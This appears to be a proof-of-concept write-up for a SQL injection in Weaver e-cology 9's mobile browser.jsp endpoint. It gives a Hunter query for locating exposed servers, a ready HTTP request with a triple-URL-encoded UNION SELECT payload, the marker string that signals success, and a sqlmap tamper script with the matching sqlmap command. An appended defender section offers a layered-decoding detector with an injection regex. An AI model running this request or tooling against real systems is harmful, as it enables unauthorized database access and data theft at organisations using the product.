SQL injection vulnerability in Weaver (泛微) e-cology 9 browser
1. Vulnerability overview
泛微 e-cology is a collaborative management platform developed by Weaver Network Technology (泛微网络科技); it covers human resources, finance, administration and other functions, and supports mobile office use. The browser component of e-cology 9 contains a SQL injection vulnerability through which an attacker can obtain sensitive information from the database.
2. Affected versions
- Weaver (泛微) e-cology 9
3. Asset discovery
- hunter
app.name=="泛微 e-cology 9.0 OA"
- Fingerprint
4. Reproduction
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1222
isDis=1&browserTypeId=269&keyword=%25%32%35%36%31%25%32%35%32%37%25%32%35%32%30%25%32%35%37%35%25%32%35%36%65%25%32%35%36%39%25%32%35%36%66%25%32%35%36%65%25%32%35%32%30%25%32%35%37%33%25%32%35%36%35%25%32%35%36%63%25%32%35%36%35%25%32%35%36%33%25%32%35%37%34%25%32%35%32%30%25%32%35%33%31%25%32%35%32%63%25%32%35%32%37%25%32%35%32%37%25%32%35%32%62%25%32%35%32%38%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%32%38%25%32%35%34%33%25%32%35%34%31%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%35%37%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%32%38%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%33%64%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%32%39%25%32%35%32%30%25%32%35%35%34%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%39%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%63%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%34%33%
25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%38%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%65%25%32%35%34%34%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%32%37
Marker string returned in the response: qxxkq1qqkqq
tamper script url3encode.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SQLMap tamper script: URL-encode the payload twice, then replace every '%' with '%25'
(a third encoding layer), so the target has to decode three times before the SQL is visible
"""
import re


def tamper(payload, **kwargs):
    """
    Perform two URL encodings on the payload and replace all '%' with '%25'
    """
    # sqlmap may call a tamper with an empty payload; pass it through unchanged
    if not payload:
        return payload
    # Perform first URL encoding
    payload = encode(payload)
    # Perform second URL encoding
    payload = encode(payload)
    # Replace all '%' with '%25'
    payload = re.sub(r'%', '%25', payload)
    return payload


def encode(payload):
    """
    URL-encode every character of the payload as %XX
    """
    encoded_payload = ""
    for char in payload:
        # Always emit two hex digits: hex(ord('\t')) would give '%9', which is not a valid escape
        encoded_char = "%{:02x}".format(ord(char))
        encoded_payload += encoded_char
    return encoded_payload
sqlmap -r 2.txt --batch --tamper=url3encode -p keyword --prefix="a' union select 1,''+(" --suffix=")+'" --level=5 --risk=2
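The request above only works because the endpoint URL-decodes the keyword parameter more than once, which is also why a filter that decodes a single time sees nothing. The following is an added defender-side example (not code from this write-up or from Weaver) that normalises repeated encoding layers before inspecting a form body; the regex, MAX_LAYERS and the sample body are assumptions constructed for the example.

```python
# Added defender-side example (not from the write-up or Weaver's code). A filter
# that URL-decodes once sees "%25%32%35%36%31..." and no SQL, while the vulnerable
# endpoint evidently decodes further, so inspection must peel every layer first.
import re
from urllib.parse import quote, unquote

MAX_LAYERS = 5  # bound the loop; a hostile value must not make it spin

# Heuristic for the constructs in this write-up's payload; real rulesets are broader.
SQLI_PATTERN = re.compile(
    r"\bunion\s+select\b|\bselect\s*\(?\s*case\b|\bchar\s*\(\s*\d+\s*\)",
    re.IGNORECASE,
)


def decode_layers(value, max_layers=MAX_LAYERS):
    """Unquote until the value stops changing; return (decoded, layers removed)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def inspect_param(name, raw_value):
    """Classify one raw (still-encoded) form field."""
    decoded, layers = decode_layers(raw_value)
    return {
        "param": name,
        "layers": layers,
        "decoded": decoded,
        # Match on the fully decoded value; the layer count is reported, not
        # alerted on by itself, since a user-typed "100%" also survives two decodes.
        "suspicious": SQLI_PATTERN.search(decoded) is not None,
    }


def inspect_form_body(body):
    """Split a raw application/x-www-form-urlencoded body without decoding it."""
    return [inspect_param(*pair.partition("=")[::2]) for pair in body.split("&")]


# Constructed sample: the write-up's injection shape, URL-encoded three times
# (urllib leaves letters bare, unlike the tamper script; both decode the same way).
PLAIN_PAYLOAD = "a' union select 1,''+(CHAR(113)+CHAR(120))+'"
TRIPLE_ENCODED = quote(quote(quote(PLAIN_PAYLOAD, safe=""), safe=""), safe="")
SAMPLE_BODY = "isDis=1&browserTypeId=269&keyword=" + TRIPLE_ENCODED
```

Running inspect_form_body(SAMPLE_BODY) reports three decoding layers and a keyword hit on the keyword field and nothing on the two numeric fields; feeding it the request body from the reproduction section gives the same result.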